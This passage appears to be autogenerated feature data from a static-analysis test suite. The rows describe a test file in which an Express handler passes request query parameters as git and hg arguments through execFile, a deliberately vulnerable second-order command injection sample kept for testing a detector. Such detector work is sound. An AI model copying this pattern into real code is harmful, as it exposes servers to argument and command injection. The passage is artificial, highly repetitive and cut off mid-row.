autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | exceptional return of execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | exceptional return of execFil ... emote]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | exceptional return of execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | exceptional return of execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | exceptional return of execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | execFil ... emote]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:12:42:15 | "hg" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:18:42:47 | ["whate ... remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:19:42:28 | "whatever" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:33 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:33 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:33 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:39 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:39 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:39 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:39 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:39 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:35:42:39 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:35:42:39 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:35:42:39 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:35:42:39 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:35:42:39 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:41:42:46 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:41:42:46 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:41:42:46 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:41:42:46 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:41:42:46 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | exceptional return of execFil ... y.args) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | exceptional return of execFil ... y.args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | exceptional return of execFil ... y.args) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | exceptional return of execFil ... y.args) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | exceptional return of execFil ... y.args) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | execFil ... y.args) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | execFil ... y.args) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | execFil ... y.args) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | execFil ... y.args) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | execFil ... y.args) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:12:44:15 | "hg" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:20 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:20 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:20 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:20 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:26 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:26 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:26 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:26 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:26 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:18:44:31 | req.query.args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:22:44:26 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:22:44:26 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:22:44:26 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:22:44:26 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:22:44:26 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:28:44:31 | args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:28:44:31 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:28:44:31 | args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:28:44:31 | args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:28:44:31 | args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:10 | execFile | enclosingFunctionBody | req res remote req query 